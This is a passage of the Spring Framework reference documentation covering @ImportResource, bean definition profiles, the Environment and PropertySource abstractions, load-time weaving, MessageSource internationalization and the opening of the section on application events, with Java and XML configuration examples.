`@Configuration`-annotated\nclasses are automatically candidates for component scanning. 
Using the same scenario as\nabove, we can redefine `system-test-config.xml` to take advantage of component-scanning.\nNote that in this case, we don't need to explicitly declare\n`<context:annotation-config\/>`, because `<context:component-scan\/>` enables the same\nfunctionality.\n\n*system-test-config.xml*:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<!-- picks up and registers AppConfig as a bean definition -->\n\t\t<context:component-scan base-package=\"com.acme\"\/>\n\t\t<context:property-placeholder location=\"classpath:\/com\/acme\/jdbc.properties\"\/>\n\n\t\t<bean class=\"org.springframework.jdbc.datasource.DriverManagerDataSource\">\n\t\t\t<property name=\"url\" value=\"${jdbc.url}\"\/>\n\t\t\t<property name=\"username\" value=\"${jdbc.username}\"\/>\n\t\t\t<property name=\"password\" value=\"${jdbc.password}\"\/>\n\t\t<\/bean>\n\t<\/beans>\n----\n--\n\n[[beans-java-combining-java-centric]]\n===== @Configuration class-centric use of XML with @ImportResource\n\nIn applications where `@Configuration` classes are the primary mechanism for configuring\nthe container, it will still likely be necessary to use at least some XML. In these\nscenarios, simply use `@ImportResource` and define only as much XML as is needed. Doing\nso achieves a \"Java-centric\" approach to configuring the container and keeps XML to a\nbare minimum.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ImportResource(\"classpath:\/com\/acme\/properties-config.xml\")\n\tpublic class AppConfig {\n\n\t\t@Value(\"${jdbc.url}\")\n\t\tprivate String url;\n\n\t\t@Value(\"${jdbc.username}\")\n\t\tprivate String username;\n\n\t\t@Value(\"${jdbc.password}\")\n\t\tprivate String password;\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new DriverManagerDataSource(url, username, password);\n\t\t}\n\n\t}\n----\n\n*properties-config.xml*:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:property-placeholder location=\"classpath:\/com\/acme\/jdbc.properties\"\/>\n\t<\/beans>\n----\n\n*jdbc.properties*:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\njdbc.url=jdbc:hsqldb:hsql:\/\/localhost\/xdb\njdbc.username=sa\njdbc.password=\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(AppConfig.class);\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\t\/\/ ...\n\t}\n----\n\n[[beans-environment]]\n== Environment abstraction\n\nThe {api-spring-framework}\/core\/env\/Environment.html[`Environment`]\nis an abstraction integrated in the container that models two key\naspects of the application environment: <<beans-definition-profiles,_profiles_>>\nand <<beans-property-source-abstraction,_properties_>>.\n\nA _profile_ is a named, logical group of bean definitions to be registered with the\ncontainer only if the given profile is active. Beans may be assigned to a profile\nwhether defined in XML or via annotations. The role of the `Environment` object with\nrelation to profiles is in determining which profiles (if any) are currently active,\nand which profiles (if any) should be active by default.\n\nProperties play an important role in almost all applications, and may originate from\na variety of sources: properties files, JVM system properties, system environment\nvariables, JNDI, servlet context parameters, ad-hoc Properties objects, Maps, and so\non. 
The role of the `Environment` object with relation to properties is to provide the\nuser with a convenient service interface for configuring property sources and resolving\nproperties from them.\n\n[[beans-definition-profiles]]\n=== Bean definition profiles\n\nBean definition profiles is a mechanism in the core container that allows for\nregistration of different beans in different environments. The word _environment_\ncan mean different things to different users and this feature can help with many\nuse cases, including:\n\n* working against an in-memory datasource in development vs looking up that same\ndatasource from JNDI when in QA or production\n* registering monitoring infrastructure only when deploying an application into a\nperformance environment\n* registering customized implementations of beans for customer A vs. customer\nB deployments\n\nLet's consider the first use case in a practical application that requires a\n`DataSource`. In a test environment, the configuration may look like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean\n\tpublic DataSource dataSource() {\n\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t.addScript(\"my-schema.sql\")\n\t\t\t.addScript(\"my-test-data.sql\")\n\t\t\t.build();\n\t}\n----\n\nLet's now consider how this application will be deployed into a QA or production\nenvironment, assuming that the datasource for the application will be registered\nwith the production application server's JNDI directory. Our `dataSource` bean\nnow looks like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean(destroyMethod=\"\")\n\tpublic DataSource dataSource() throws Exception {\n\t\tContext ctx = new InitialContext();\n\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t}\n----\n\nThe problem is how to switch between using these two variations based on the\ncurrent environment. Over time, Spring users have devised a number of ways to\nget this done, usually relying on a combination of system environment variables\nand XML `<import\/>` statements containing `${placeholder}` tokens that resolve\nto the correct configuration file path depending on the value of an environment\nvariable. Bean definition profiles is a core container feature that provides a\nsolution to this problem.\n\nIf we generalize the example use case above of environment-specific bean\ndefinitions, we end up with the need to register certain bean definitions in\ncertain contexts, while not in others. You could say that you want to register a\ncertain profile of bean definitions in situation A, and a different profile in\nsituation B. Let's first see how we can update our configuration to reflect\nthis need.\n\n[[beans-definition-profiles-java]]\n==== @Profile\n\nThe {api-spring-framework}\/context\/annotation\/Profile.html[`@Profile`]\nannotation allows you to indicate that a component is eligible for registration\nwhen one or more specified profiles are active. 
Using our example above, we\ncan rewrite the `dataSource` configuration as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t**@Profile(\"dev\")**\n\tpublic class StandaloneDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t**@Profile(\"production\")**\n\tpublic class JndiDataConfig {\n\n\t\t@Bean(destroyMethod=\"\")\n\t\tpublic DataSource dataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[NOTE]\n====\nAs mentioned before, with `@Bean` methods, you will typically choose to use programmatic\nJNDI lookups: either using Spring's `JndiTemplate`\/`JndiLocatorDelegate` helpers or the\nstraight JNDI `InitialContext` usage shown above, but not the `JndiObjectFactoryBean`\nvariant, which would force you to declare the return type as the `FactoryBean` type.\n====\n\n`@Profile` can be used as a <<beans-meta-annotations,meta-annotation>> for the purpose\nof creating a custom _composed annotation_. The following example defines a custom\n`@Production` annotation that can be used as a drop-in replacement for\n`@Profile(\"production\")`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t**@Profile(\"production\")**\n\tpublic @interface Production {\n\t}\n----\n\n`@Profile` can also be declared at the method level to include only one particular bean\nof a configuration class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\t**@Profile(\"dev\")**\n\t\tpublic DataSource devDataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\n\t\t@Bean\n\t\t**@Profile(\"production\")**\n\t\tpublic DataSource productionDataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[TIP]\n====\nIf a `@Configuration` class is marked with `@Profile`, all of the `@Bean` methods and\n`@Import` annotations associated with that class will be bypassed unless one or more of\nthe specified profiles are active. If a `@Component` or `@Configuration` class is marked\nwith `@Profile({\"p1\", \"p2\"})`, that class will not be registered\/processed unless\nprofiles 'p1' and\/or 'p2' have been activated. If a given profile is prefixed with the\nNOT operator (`!`), the annotated element will be registered if the profile is **not**\nactive. For example, given `@Profile({\"p1\", \"!p2\"})`, registration will occur if profile\n'p1' is active or if profile 'p2' is not active.\n====\n\n[[beans-definition-profiles-xml]]\n==== XML bean definition profiles\n\nThe XML counterpart is the `profile` attribute of the `<beans>` element. 
Our sample\nconfiguration above can be rewritten in two XML files as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans profile=\"dev\"\n\t\txmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t<\/jdbc:embedded-database>\n\t<\/beans>\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans profile=\"production\"\n\t\txmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t<\/beans>\n----\n\nIt is also possible to avoid that split and nest `<beans\/>` elements within the same file:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<!-- other bean definitions -->\n\n\t\t<beans profile=\"dev\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t\t<beans profile=\"production\">\n\t\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t\t<\/beans>\n\t<\/beans>\n----\n\nThe `spring-beans.xsd` has been constrained to allow such elements only as the\nlast ones in the file. This should help provide flexibility without incurring\nclutter in the XML files.\n\n[[beans-definition-profiles-enable]]\n==== Activating a profile\n\nNow that we have updated our configuration, we still need to instruct Spring which\nprofile is active. If we started our sample application right now, we would see\na `NoSuchBeanDefinitionException` thrown, because the container could not find\nthe Spring bean named `dataSource`.\n\nActivating a profile can be done in several ways, but the most straightforward is to do\nit programmatically against the `Environment` API, which is available via an\n`ApplicationContext`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tAnnotationConfigApplicationContext ctx = new AnnotationConfigApplicationContext();\n\tctx.getEnvironment().setActiveProfiles(\"dev\");\n\tctx.register(SomeConfig.class, StandaloneDataConfig.class, JndiDataConfig.class);\n\tctx.refresh();\n----\n\nIn addition, profiles may also be activated declaratively through the\n`spring.profiles.active` property, which may be specified through system environment\nvariables, JVM system properties, servlet context parameters in `web.xml`, or even as an\nentry in JNDI (see <<beans-property-source-abstraction>>). 
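For example, in a web application, the profile can be activated with a servlet context\nparameter in `web.xml` (a minimal sketch; the profile name `production` is illustrative):\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<context-param>\n\t\t<param-name>spring.profiles.active<\/param-name>\n\t\t<param-value>production<\/param-value>\n\t<\/context-param>\n----\n\n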
In integration tests, active\nprofiles can be declared via the `@ActiveProfiles` annotation in the `spring-test` module\n(see <<testcontext-ctx-management-env-profiles>>).\n\nNote that profiles are not an \"either-or\" proposition; it is possible to activate multiple\nprofiles at once. Programmatically, simply provide multiple profile names to the\n`setActiveProfiles()` method, which accepts `String...` varargs:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tctx.getEnvironment().setActiveProfiles(\"profile1\", \"profile2\");\n----\n\nDeclaratively, `spring.profiles.active` may accept a comma-separated list of profile names:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t-Dspring.profiles.active=\"profile1,profile2\"\n----\n\n[[beans-definition-profiles-default]]\n==== Default profile\n\nThe _default_ profile represents the profile that is enabled by default. Consider the\nfollowing:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t**@Profile(\"default\")**\n\tpublic class DefaultDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\nIf no profile is active, the `dataSource` above will be created; this can be\nseen as a way to provide a _default_ definition for one or more beans. If any\nprofile is enabled, the _default_ profile will not apply.\n\nThe name of the default profile can be changed using `setDefaultProfiles()` on\nthe `Environment` or declaratively using the `spring.profiles.default` property.\n\n[[beans-property-source-abstraction]]\n=== PropertySource abstraction\n\nSpring's `Environment` abstraction provides search operations over a configurable\nhierarchy of property sources. To explain fully, consider the following:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nApplicationContext ctx = new GenericApplicationContext();\nEnvironment env = ctx.getEnvironment();\nboolean containsFoo = env.containsProperty(\"foo\");\nSystem.out.println(\"Does my environment contain the 'foo' property? \" + containsFoo);\n----\n\nIn the snippet above, we see a high-level way of asking Spring whether the `foo` property is\ndefined for the current environment. To answer this question, the `Environment` object performs\na search over a set of {api-spring-framework}\/core\/env\/PropertySource.html[`PropertySource`]\nobjects. A `PropertySource` is a simple abstraction over any source of key-value pairs, and\nSpring's {api-spring-framework}\/core\/env\/StandardEnvironment.html[`StandardEnvironment`]\nis configured with two PropertySource objects -- one representing the set of JVM system properties\n(_a la_ `System.getProperties()`) and one representing the set of system environment variables\n(_a la_ `System.getenv()`).\n\n[NOTE]\n====\nThese default property sources are present for `StandardEnvironment`, for use in standalone\napplications. {api-spring-framework}\/web\/context\/support\/StandardServletEnvironment.html[`StandardServletEnvironment`]\nis populated with additional default property sources including servlet config and servlet\ncontext parameters. 
It can optionally enable a {api-spring-framework}\/jndi\/JndiPropertySource.html[`JndiPropertySource`].\nSee the javadocs for details.\n====\n\nConcretely, when using the `StandardEnvironment`, the call to `env.containsProperty(\"foo\")`\nwill return true if a `foo` system property or `foo` environment variable is present at\nruntime.\n\n[TIP]\n====\nThe search performed is hierarchical. By default, system properties have precedence over\nenvironment variables, so if the `foo` property happens to be set in both places during\na call to `env.getProperty(\"foo\")`, the system property value will 'win' and be returned\npreferentially over the environment variable. Note that property values will not get merged\nbut rather completely overridden by a preceding entry.\n\nFor a common `StandardServletEnvironment`, the full hierarchy looks as follows, with the\nhighest-precedence entries at the top:\n\n* ServletConfig parameters (if applicable, e.g. in case of a `DispatcherServlet` context)\n* ServletContext parameters (web.xml context-param entries)\n* JNDI environment variables (\"java:comp\/env\/\" entries)\n* JVM system properties (\"-D\" command-line arguments)\n* JVM system environment (operating system environment variables)\n====\n\nMost importantly, the entire mechanism is configurable. Perhaps you have a custom source\nof properties that you'd like to integrate into this search. No problem -- simply implement\nand instantiate your own `PropertySource` and add it to the set of `PropertySources` for the\ncurrent `Environment`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nConfigurableApplicationContext ctx = new GenericApplicationContext();\nMutablePropertySources sources = ctx.getEnvironment().getPropertySources();\nsources.addFirst(new MyPropertySource());\n----\n\nIn the code above, `MyPropertySource` has been added with highest precedence in the\nsearch. If it contains a `foo` property, it will be detected and returned ahead of\nany `foo` property in any other `PropertySource`. The\n{api-spring-framework}\/core\/env\/MutablePropertySources.html[`MutablePropertySources`]\nAPI exposes a number of methods that allow for precise manipulation of the set of\nproperty sources.\n\n=== @PropertySource\n\nThe {api-spring-framework}\/context\/annotation\/PropertySource.html[`@PropertySource`]\nannotation provides a convenient and declarative mechanism for adding a `PropertySource`\nto Spring's `Environment`.\n\nGiven a file \"app.properties\" containing the key\/value pair `testbean.name=myTestBean`,\nthe following `@Configuration` class uses `@PropertySource` in such a way that\na call to `testBean.getName()` will return \"myTestBean\".\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n @Configuration\n **@PropertySource(\"classpath:\/com\/myco\/app.properties\")**\n public class AppConfig {\n\t @Autowired\n\t Environment env;\n\n\t @Bean\n\t public TestBean testBean() {\n\t\t TestBean testBean = new TestBean();\n\t\t testBean.setName(env.getProperty(\"testbean.name\"));\n\t\t return testBean;\n\t }\n }\n----\n\nAny `${...}` placeholders present in a `@PropertySource` resource location will\nbe resolved against the set of property sources already registered against the\nenvironment. 
For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n @Configuration\n @PropertySource(\"classpath:\/com\/${my.placeholder:default\/path}\/app.properties\")\n public class AppConfig {\n\t @Autowired\n\t Environment env;\n\n\t @Bean\n\t public TestBean testBean() {\n\t\t TestBean testBean = new TestBean();\n\t\t testBean.setName(env.getProperty(\"testbean.name\"));\n\t\t return testBean;\n\t }\n }\n----\n\nAssuming that \"my.placeholder\" is present in one of the property sources already\nregistered, e.g. system properties or environment variables, the placeholder will\nbe resolved to the corresponding value. If not, then \"default\/path\" will be used\nas a default. If no default is specified and a property cannot be resolved, an\n`IllegalArgumentException` will be thrown.\n\n\n=== Placeholder resolution in statements\n\nHistorically, the value of placeholders in elements could be resolved only against\nJVM system properties or environment variables. No longer is this the case. Because\nthe Environment abstraction is integrated throughout the container, it's easy to\nroute resolution of placeholders through it. This means that you may configure the\nresolution process in any way you like: change the precedence of searching through\nsystem properties and environment variables, or remove them entirely; add your\nown property sources to the mix as appropriate.\n\nConcretely, the following statement works regardless of where the `customer`\nproperty is defined, as long as it is available in the `Environment`:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<import resource=\"com\/bank\/service\/${customer}-config.xml\"\/>\n\t<\/beans>\n----\n\n\n[[context-load-time-weaver]]\n== Registering a LoadTimeWeaver\n\nThe `LoadTimeWeaver` is used by Spring to dynamically transform classes as they are\nloaded into the Java virtual machine (JVM).\n\nTo enable load-time weaving, add `@EnableLoadTimeWeaving` to one of your\n`@Configuration` classes:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@EnableLoadTimeWeaving\n\tpublic class AppConfig {\n\n\t}\n----\n\nAlternatively, for XML configuration, use the `context:load-time-weaver` element:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:load-time-weaver\/>\n\t<\/beans>\n----\n\nOnce configured for the `ApplicationContext`, any bean within that `ApplicationContext`\nmay implement `LoadTimeWeaverAware`, thereby receiving a reference to the load-time\nweaver instance. This is particularly useful in combination with <<orm-jpa,Spring's JPA\nsupport>> where load-time weaving may be necessary for JPA class transformation. Consult\nthe `LocalContainerEntityManagerFactoryBean` javadocs for more detail. For more on\nAspectJ load-time weaving, see <<aop-aj-ltw>>.\n\n\n\n\n[[context-introduction]]\n== Additional Capabilities of the ApplicationContext\n\nAs was discussed in the chapter introduction, the `org.springframework.beans.factory`\npackage provides basic functionality for managing and manipulating beans, including in a\nprogrammatic way. The `org.springframework.context` package adds the\n{api-spring-framework}\/context\/ApplicationContext.html[`ApplicationContext`]\ninterface, which extends the `BeanFactory` interface, in addition to extending other\ninterfaces to provide additional functionality in a more __application\nframework-oriented style__. 
Many people use the `ApplicationContext` in a completely\ndeclarative fashion, not even creating it programmatically, but instead relying on\nsupport classes such as `ContextLoader` to automatically instantiate an\n`ApplicationContext` as part of the normal startup process of a Java EE web application.\n\nTo enhance `BeanFactory` functionality in a more framework-oriented style, the context\npackage also provides the following functionality:\n\n* __Access to messages in i18n-style__, through the `MessageSource` interface.\n* __Access to resources__, such as URLs and files, through the `ResourceLoader` interface.\n* __Event publication__ to beans implementing the `ApplicationListener` interface,\n through the use of the `ApplicationEventPublisher` interface.\n* __Loading of multiple (hierarchical) contexts__, allowing each to be focused on one\n particular layer, such as the web layer of an application, through the\n `HierarchicalBeanFactory` interface.\n\n\n\n[[context-functionality-messagesource]]\n=== Internationalization using MessageSource\n\nThe `ApplicationContext` interface extends an interface called `MessageSource`, and\ntherefore provides internationalization (i18n) functionality. Spring also provides the\ninterface `HierarchicalMessageSource`, which can resolve messages hierarchically.\nTogether these interfaces provide the foundation upon which Spring effects message\nresolution. The methods defined on these interfaces include:\n\n* `String getMessage(String code, Object[] args, String defaultMessage, Locale locale)`: The basic\n method used to retrieve a message from the `MessageSource`. When no message is found\n for the specified locale, the default message is used. Any arguments passed in become\n replacement values, using the `MessageFormat` functionality provided by the standard\n library.\n* `String getMessage(String code, Object[] args, Locale locale)`: Essentially the same as\n the previous method, but with one difference: no default message can be specified; if\n the message cannot be found, a `NoSuchMessageException` is thrown.\n* `String getMessage(MessageSourceResolvable resolvable, Locale locale)`: All properties\n used in the preceding methods are also wrapped in a class named\n `MessageSourceResolvable`, which you can use with this method.\n\nWhen an `ApplicationContext` is loaded, it automatically searches for a `MessageSource`\nbean defined in the context. The bean must have the name `messageSource`. If such a bean\nis found, all calls to the preceding methods are delegated to the message source. If no\nmessage source is found, the `ApplicationContext` attempts to find a parent containing a\nbean with the same name. If it does, it uses that bean as the `MessageSource`. If the\n`ApplicationContext` cannot find any source for messages, an empty\n`DelegatingMessageSource` is instantiated in order to be able to accept calls to the\nmethods defined above.\n\nSpring provides two `MessageSource` implementations, `ResourceBundleMessageSource` and\n`StaticMessageSource`. Both implement `HierarchicalMessageSource` in order to do nested\nmessaging. The `StaticMessageSource` is rarely used but provides programmatic ways to\nadd messages to the source. 
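As a minimal sketch of that programmatic style (the message code and text here are\nillustrative, e.g. for use in a test):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tStaticMessageSource messages = new StaticMessageSource();\n\t\/\/ register a message under a code for a given locale\n\tmessages.addMessage(\"argument.required\", Locale.ENGLISH, \"The {0} argument is required.\");\n\tString msg = messages.getMessage(\"argument.required\", new Object[] {\"userDao\"}, Locale.ENGLISH);\n----\n\n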
The `ResourceBundleMessageSource` is shown in the following\nexample:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"messageSource\"\n\t\t\t\tclass=\"org.springframework.context.support.ResourceBundleMessageSource\">\n\t\t\t<property name=\"basenames\">\n\t\t\t\t<list>\n\t\t\t\t\t<value>format<\/value>\n\t\t\t\t\t<value>exceptions<\/value>\n\t\t\t\t\t<value>windows<\/value>\n\t\t\t\t<\/list>\n\t\t\t<\/property>\n\t\t<\/bean>\n\t<\/beans>\n----\n\nIn the example it is assumed you have three resource bundles defined in your classpath\ncalled `format`, `exceptions` and `windows`. Any request to resolve a message will be\nhandled in the JDK standard way of resolving messages through ResourceBundles. For the\npurposes of the example, assume the contents of two of the above resource bundle files\nare...\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t# in format.properties\n\tmessage=Alligators rock!\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t# in exceptions.properties\n\targument.required=The {0} argument is required.\n----\n\nA program to execute the `MessageSource` functionality is shown in the next example.\nRemember that all `ApplicationContext` implementations are also `MessageSource`\nimplementations and so can be cast to the `MessageSource` interface.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tMessageSource resources = new ClassPathXmlApplicationContext(\"beans.xml\");\n\t\tString message = resources.getMessage(\"message\", null, \"Default\", null);\n\t\tSystem.out.println(message);\n\t}\n----\n\nThe resulting output from the above program will be...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nAlligators rock!\n----\n\nSo to summarize, the `MessageSource` is defined in a file called `beans.xml`, which\nexists at the root of your classpath. The `messageSource` bean definition refers to a\nnumber of resource bundles through its `basenames` property. 
The three files that are\npassed in the list to the `basenames` property exist as files at the root of your\nclasspath and are called `format.properties`, `exceptions.properties`, and\n`windows.properties` respectively.\n\nThe next example shows arguments passed to the message lookup; these arguments will be\nconverted into Strings and inserted into placeholders in the lookup message.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<!-- this MessageSource is being used in a web application -->\n\t\t<bean id=\"messageSource\" class=\"org.springframework.context.support.ResourceBundleMessageSource\">\n\t\t\t<property name=\"basename\" value=\"exceptions\"\/>\n\t\t<\/bean>\n\n\t\t<!-- lets inject the above MessageSource into this POJO -->\n\t\t<bean id=\"example\" class=\"com.foo.Example\">\n\t\t\t<property name=\"messages\" ref=\"messageSource\"\/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class Example {\n\n\t\tprivate MessageSource messages;\n\n\t\tpublic void setMessages(MessageSource messages) {\n\t\t\tthis.messages = messages;\n\t\t}\n\n\t\tpublic void execute() {\n\t\t\tString message = this.messages.getMessage(\"argument.required\",\n\t\t\t\tnew Object [] {\"userDao\"}, \"Required\", null);\n\t\t\tSystem.out.println(message);\n\t\t}\n\n\t}\n----\n\nThe resulting output from the invocation of the `execute()` method will be...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nThe userDao argument is required.\n----\n\nWith regard to internationalization (i18n), Spring's various `MessageSource`\nimplementations follow the same locale resolution and fallback rules as the standard JDK\n`ResourceBundle`. In short, and continuing with the example `messageSource` defined\npreviously, if you want to resolve messages against the British (`en-GB`) locale, you\nwould create files called `format_en_GB.properties`, `exceptions_en_GB.properties`, and\n`windows_en_GB.properties` respectively.\n\nTypically, locale resolution is managed by the surrounding environment of the\napplication. In this example, the locale against which (British) messages will be\nresolved is specified manually.\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\n# in exceptions_en_GB.properties\nargument.required=Ebagum lad, the {0} argument is required, I say, required.\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(final String[] args) {\n\t\tMessageSource resources = new ClassPathXmlApplicationContext(\"beans.xml\");\n\t\tString message = resources.getMessage(\"argument.required\",\n\t\t\tnew Object [] {\"userDao\"}, \"Required\", Locale.UK);\n\t\tSystem.out.println(message);\n\t}\n----\n\nThe resulting output from the running of the above program will be...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nEbagum lad, the 'userDao' argument is required, I say, required.\n----\n\nYou can also use the `MessageSourceAware` interface to acquire a reference to any\n`MessageSource` that has been defined. Any bean that is defined in an\n`ApplicationContext` that implements the `MessageSourceAware` interface is injected with\nthe application context's `MessageSource` when the bean is created and configured.\n\n[NOTE]\n====\n__As an alternative to `ResourceBundleMessageSource`, Spring provides a\n`ReloadableResourceBundleMessageSource` class. 
\n[NOTE]\n====\n__As an alternative to `ResourceBundleMessageSource`, Spring provides a\n`ReloadableResourceBundleMessageSource` class. This variant supports the same bundle\nfile format but is more flexible than the standard JDK based\n`ResourceBundleMessageSource` implementation.__ In particular, it allows for reading\nfiles from any Spring resource location (not just from the classpath) and supports hot\nreloading of bundle property files (while efficiently caching them in between). Check\nout the `ReloadableResourceBundleMessageSource` javadocs for details.\n====\n\n\n\n[[context-functionality-events]]\n=== Standard and Custom Events\n\nEvent handling in the `ApplicationContext` is provided through the `ApplicationEvent`\nclass and `ApplicationListener` interface. If a bean that implements the\n`ApplicationListener` interface is deployed into the context, every time an\n`ApplicationEvent` gets published to the `ApplicationContext`, that bean is notified.\nEssentially, this is the standard __Observer__ design pattern.\n\n[TIP]\n====\nAs of Spring 4.2, the event infrastructure has been significantly improved and offers\nan <<context-functionality-events-annotation,annotation-based model>> as well as the\nability to publish any arbitrary event, that is, an object that does not necessarily\nextend from `ApplicationEvent`. When such an object is published, we wrap it in an\nevent for you.\n====\n\nSpring provides the following standard events:\n\n[[beans-ctx-events-tbl]]\n.Built-in Events\n|===\n| Event| Explanation\n\n| `ContextRefreshedEvent`\n| Published when the `ApplicationContext` is initialized or refreshed, for example,\n using the `refresh()` method on the `ConfigurableApplicationContext` interface.\n \"Initialized\" here means that all beans are loaded, post-processor beans are detected\n and activated, singletons are pre-instantiated, and the `ApplicationContext` object is\n ready for use. As long as the context has not been closed, a refresh can be triggered\n multiple times, provided that the chosen `ApplicationContext` actually supports such\n \"hot\" refreshes. For example, `XmlWebApplicationContext` supports hot refreshes, but\n `GenericApplicationContext` does not.\n\n| `ContextStartedEvent`\n| Published when the `ApplicationContext` is started, using the `start()` method on the\n `ConfigurableApplicationContext` interface. \"Started\" here means that all `Lifecycle`\n beans receive an explicit start signal. Typically this signal is used to restart beans\n after an explicit stop, but it may also be used to start components that have not been\n 